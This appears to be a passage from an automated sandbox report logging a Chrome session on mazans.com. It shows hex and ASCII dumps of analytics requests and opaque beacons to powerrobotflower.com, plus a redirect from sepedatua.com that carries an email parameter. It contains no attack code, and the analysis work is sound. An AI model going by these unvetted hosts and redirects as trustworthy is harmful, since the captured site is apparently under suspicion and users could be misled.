                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: CLID=578bbac004b6466f83ade27540643b49.20241113.20251113
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC379INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:18 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 866
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                                                                                                          Expires: -1
                                                                                                                                                                                                                                                                                                                                                                          Request-Context: appId=cid-v1:9c7c879b-c51a-427e-9701-218438da5f81
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241113T162918Z-r178fb8d765z89v7hC1DFW0kvw000000010000000000vdgd
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC866INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 61 2c 72 2c 69 2c 74 2c 79 29 7b 61 5b 63 5d 3d 61 5b 63 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 28 61 5b 63 5d 2e 71 3d 61 5b 63 5d 2e 71 7c 7c 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 79 6e 63 28 29 7b 28 6e 65 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 2e 63 6c 61 72 69 74 79 2e 6d 73 2f 63 2e 67 69 66 22 7d 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 73 79 6e 63 28 29 3a 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 73 79 6e 63 29 3b 61 5b 63 5d 28 22 6d 65 74 61 64 61 74 61 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 5b 63 5d 28 22
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: !function(c,l,a,r,i,t,y){a[c]=a[c]||function(){(a[c].q=a[c].q||[]).push(arguments)};function sync(){(new Image).src="https://c.clarity.ms/c.gif"}"complete"==document.readyState?sync():window.addEventListener("load",sync);a[c]("metadata",(function(){a[c]("


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          91192.168.2.174991144.234.198.1844436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC585OUTPOST /v1/p HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: api.segment.io
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 1227
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1227OUTData Raw: 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 31 31 2d 31 33 54 31 36 3a 32 39 3a 31 36 2e 31 34 38 5a 22 2c 22 69 6e 74 65 67 72 61 74 69 6f 6e 73 22 3a 7b 22 53 65 67 6d 65 6e 74 2e 69 6f 22 3a 74 72 75 65 7d 2c 22 74 79 70 65 22 3a 22 70 61 67 65 22 2c 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 70 61 74 68 22 3a 22 2f 65 6e 2d 75 73 2f 34 30 34 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 73 65 70 65 64 61 74 75 61 2e 63 6f 6d 2f 22 2c 22 73 65 61 72 63 68 22 3a 22 3f 65 6d 61 69 6c 3d 45 4d 41 49 4c 5f 52 45 44 41 43 54 45 44 22 2c 22 74 69 74 6c 65 22 3a 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 7c 20 53 65 6e 64 47 72 69 64 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 65 6e 64 67 72 69 64 2e 63 6f 6d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: {"timestamp":"2024-11-13T16:29:16.148Z","integrations":{"Segment.io":true},"type":"page","properties":{"path":"/en-us/404","referrer":"https://sepedatua.com/","search":"?email=EMAIL_REDACTED","title":"Page not found | SendGrid","url":"https://sendgrid.com
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC235INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:18 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 21
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC21INData Raw: 7b 0a 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 0a 7d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: { "success": true}


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          92192.168.2.174991813.107.246.454436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC592OUTGET /s/0.7.49/clarity.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: www.clarity.ms
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: CLID=578bbac004b6466f83ade27540643b49.20241113.20251113
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC573INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:18 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 65959
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Thu, 24 Oct 2024 01:20:43 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DCF3CA14C9A428"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 1c170c6e-801e-0015-513e-2c3968000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241113T162918Z-16547b76f7fvllnfhC1DFWxkg80000000ha000000000wxeb
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 79034942
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC15811INData Raw: 2f 2a 20 63 6c 61 72 69 74 79 2d 6a 73 20 76 30 2e 37 2e 34 39 3a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 69 63 72 6f 73 6f 66 74 2f 63 6c 61 72 69 74 79 20 28 4c 69 63 65 6e 73 65 3a 20 4d 49 54 29 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 6e 75 6c 6c 2c 67 65 74 20 71 75 65 75 65 28 29 7b 72 65 74 75 72 6e 20 73 72 7d 2c 67 65 74 20 73 74 61 72 74 28 29 7b 72 65 74 75 72 6e 20 63 72 7d 2c 67 65 74 20 73 74 6f 70 28 29 7b 72 65 74 75 72 6e 20 6c 72 7d 2c 67 65 74 20 74 72 61 63 6b 28 29 7b 72 65 74 75 72 6e 20 61 72 7d 7d 29 2c 65 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 5f 5f 70 72 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: /* clarity-js v0.7.49: https://github.com/microsoft/clarity (License: MIT) */!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return sr},get start(){return cr},get stop(){return lr},get track(){return ar}}),e=Object.freeze({__pro
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC16384INData Raw: 72 3a 6e 75 6c 6c 2c 68 61 73 68 3a 6e 75 6c 6c 2c 72 65 67 69 6f 6e 3a 6c 2c 6d 65 74 61 64 61 74 61 3a 7b 61 63 74 69 76 65 3a 21 30 2c 73 75 73 70 65 6e 64 3a 21 31 2c 70 72 69 76 61 63 79 3a 66 2c 70 6f 73 69 74 69 6f 6e 3a 6e 75 6c 6c 2c 66 72 61 75 64 3a 64 2c 73 69 7a 65 3a 6e 75 6c 6c 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 61 3d 65 2e 64 61 74 61 2c 72 3d 65 2e 6d 65 74 61 64 61 74 61 2c 69 3d 72 2e 70 72 69 76 61 63 79 2c 6f 3d 61 2e 61 74 74 72 69 62 75 74 65 73 7c 7c 7b 7d 2c 75 3d 61 2e 74 61 67 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3b 73 77 69 74 63 68 28 21 30 29 7b 63 61 73 65 20 50 74 2e 69 6e 64 65 78 4f 66 28 75 29 3e 3d 30 3a 76 61 72 20 63 3d 6f 2e 74 79 70 65 2c 73 3d 22 22 2c 6c 3d 5b 22 63 6c 61 73
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: r:null,hash:null,region:l,metadata:{active:!0,suspend:!1,privacy:f,position:null,fraud:d,size:null}},function(t,e,n){var a=e.data,r=e.metadata,i=r.privacy,o=a.attributes||{},u=a.tag.toUpperCase();switch(!0){case Pt.indexOf(u)>=0:var c=o.type,s="",l=["clas
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC16384INData Raw: 62 69 6c 69 74 79 29 2c 47 72 28 31 34 2c 74 2e 69 74 65 6d 43 6f 6e 64 69 74 69 6f 6e 29 2c 47 72 28 31 33 2c 74 2e 70 72 69 63 65 43 75 72 72 65 6e 63 79 29 2c 47 72 28 31 32 2c 74 2e 73 6b 75 29 2c 57 28 31 33 2c 5a 6e 28 74 2e 70 72 69 63 65 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 62 72 61 6e 64 22 3a 47 72 28 36 2c 74 2e 6e 61 6d 65 29 7d 6e 75 6c 6c 21 3d 3d 72 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 72 26 26 4b 6e 28 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 5a 6e 28 74 2c 65 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 31 29 2c 6e 75 6c 6c 21 3d 3d 74 29 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 74 29 7b 63 61 73 65 22 6e 75 6d 62 65 72 22 3a 72 65 74 75 72 6e 20 4d 61 74 68 2e 72 6f 75 6e 64 28 74 2a 65 29 3b 63 61
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: bility),Gr(14,t.itemCondition),Gr(13,t.priceCurrency),Gr(12,t.sku),W(13,Zn(t.price));break;case"brand":Gr(6,t.name)}null!==r&&"object"==typeof r&&Kn(r)}}function Zn(t,e){if(void 0===e&&(e=1),null!==t)switch(typeof t){case"number":return Math.round(t*e);ca
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC16384INData Raw: 53 74 2e 69 64 29 2c 65 2e 70 75 73 68 28 53 74 2e 74 61 72 67 65 74 29 2c 65 2e 70 75 73 68 28 53 74 2e 63 68 65 63 6b 73 75 6d 29 2c 73 72 28 65 2c 21 31 29 29 7d 72 65 74 75 72 6e 5b 32 5d 7d 29 29 7d 29 29 7d 76 61 72 20 62 72 2c 77 72 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6b 72 28 74 2c 65 2c 6e 2c 61 2c 72 29 7b 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 6e 75 6c 6c 29 2c 76 6f 69 64 20 30 3d 3d 3d 61 26 26 28 61 3d 6e 75 6c 6c 29 2c 76 6f 69 64 20 30 3d 3d 3d 72 26 26 28 72 3d 6e 75 6c 6c 29 3b 76 61 72 20 69 3d 6e 3f 22 22 2e 63 6f 6e 63 61 74 28 6e 2c 22 7c 22 29 2e 63 6f 6e 63 61 74 28 61 29 3a 22 22 3b 74 20 69 6e 20 77 72 26 26 77 72 5b 74 5d 2e 69 6e 64 65 78 4f 66 28 69 29 3e 3d 30 7c 7c 28 62 72 3d 7b 63 6f 64 65 3a 74 2c 6e 61 6d 65 3a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: St.id),e.push(St.target),e.push(St.checksum),sr(e,!1))}return[2]}))}))}var br,wr={};function kr(t,e,n,a,r){void 0===n&&(n=null),void 0===a&&(a=null),void 0===r&&(r=null);var i=n?"".concat(n,"|").concat(a):"";t in wr&&wr[t].indexOf(i)>=0||(br={code:t,name:
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC996INData Raw: 57 69 28 74 29 2c 7a 69 28 29 2c 62 74 28 29 2c 24 69 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 69 28 74 2e 73 74 61 72 74 29 28 29 7d 29 29 2c 6e 75 6c 6c 3d 3d 3d 74 26 26 69 6f 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 65 6f 28 29 7b 50 69 28 29 26 26 28 24 69 2e 73 6c 69 63 65 28 29 2e 72 65 76 65 72 73 65 28 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 69 28 74 2e 73 74 6f 70 29 28 29 7d 29 29 2c 77 74 28 29 2c 48 69 28 29 2c 76 6f 69 64 20 30 21 3d 3d 61 6f 26 26 28 61 6f 5b 72 6f 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 28 61 6f 5b 72 6f 5d 2e 71 3d 61 6f 5b 72 6f 5d 2e 71 7c 7c 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 2c 22 73 74 61 72 74 22
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: Wi(t),zi(),bt(),$i.forEach((function(t){return Oi(t.start)()})),null===t&&io())}function eo(){Pi()&&($i.slice().reverse().forEach((function(t){return Oi(t.stop)()})),wt(),Hi(),void 0!==ao&&(ao[ro]=function(){(ao[ro].q=ao[ro].q||[]).push(arguments),"start"


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          93192.168.2.174990854.75.69.1924436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC669OUTPOST /mon HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: obseu.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 1866
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: cg_uuid=a7672655cc19ce211243958c37046200
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1866OUTData Raw: 65 3d 33 37 64 66 62 64 38 65 65 38 34 65 30 30 31 32 36 39 65 66 63 32 33 34 65 66 34 34 38 66 39 38 39 32 32 35 63 32 34 66 35 36 37 64 34 33 64 36 64 61 31 39 30 38 62 65 36 32 34 35 63 61 64 37 62 64 37 30 61 39 37 36 37 31 30 63 65 36 30 65 64 38 39 33 37 33 62 66 65 37 30 65 39 63 32 30 63 31 65 35 33 65 38 64 35 39 31 33 38 34 36 62 32 30 31 37 30 37 31 61 31 30 61 63 66 39 66 32 39 66 36 37 31 38 38 35 38 35 38 65 30 35 32 61 33 61 31 65 61 64 32 62 37 36 30 64 64 34 36 65 64 64 36 33 63 36 30 36 33 34 30 36 32 61 39 36 35 61 35 33 35 63 33 32 30 34 35 62 63 30 62 63 36 62 34 66 37 37 62 65 32 36 62 62 32 35 63 62 34 33 65 32 39 32 33 63 66 33 34 63 36 64 61 39 30 39 33 33 37 38 31 34 64 61 34 64 65 34 34 34 65 63 38 62 63 35 39 61 37 65 65 34 36
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: e=37dfbd8ee84e001269efc234ef448f989225c24f567d43d6da1908be6245cad7bd70a976710ce60ed89373bfe70e9c20c1e53e8d5913846b2017071a10acf9f29f671885858e052a3a1ead2b760dd46edd63c60634062a965a535c32045bc0bc6b4f77be26bb25cb43e2923cf34c6da909337814da4de444ec8bc59a7ee46
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC277INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:18 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          94192.168.2.174990754.75.69.1924436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC669OUTPOST /mon HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: obseu.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 1933
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: cg_uuid=a7672655cc19ce211243958c37046200
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1933OUTData Raw: 65 3d 33 37 64 66 62 64 38 65 65 38 34 65 30 30 31 32 36 39 65 66 63 32 33 34 65 66 34 34 38 66 39 38 39 32 32 35 63 32 34 66 35 36 37 64 34 33 64 36 64 61 31 39 30 38 62 65 36 32 34 35 63 61 64 37 62 64 37 30 61 39 37 36 37 31 30 63 65 36 30 65 64 38 39 33 37 33 62 66 65 37 30 65 39 63 32 30 63 31 65 35 33 65 38 64 35 39 31 33 38 34 36 62 32 30 31 37 30 37 31 61 31 30 61 63 66 39 66 32 39 66 36 37 31 38 38 35 38 35 38 65 30 35 32 61 33 61 31 65 61 64 32 62 37 36 30 64 64 34 36 65 64 64 36 33 63 36 30 36 33 34 30 36 32 61 39 36 35 61 35 33 35 63 33 32 30 34 35 62 63 30 62 63 36 62 34 66 37 37 62 65 32 36 62 62 32 35 63 62 34 33 65 32 39 32 33 63 66 33 34 63 36 64 61 39 30 39 33 33 37 38 31 34 64 61 34 64 65 34 34 34 65 63 38 62 63 35 39 61 37 65 65 34 36
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: e=37dfbd8ee84e001269efc234ef448f989225c24f567d43d6da1908be6245cad7bd70a976710ce60ed89373bfe70e9c20c1e53e8d5913846b2017071a10acf9f29f671885858e052a3a1ead2b760dd46edd63c60634062a965a535c32045bc0bc6b4f77be26bb25cb43e2923cf34c6da909337814da4de444ec8bc59a7ee46
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC277INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:18 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          95192.168.2.1749919157.240.253.14436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1195OUTGET /signals/config/731950963606637?v=2.9.176&r=stable&domain=mazans.com&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: connect.facebook.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1452INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          timing-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
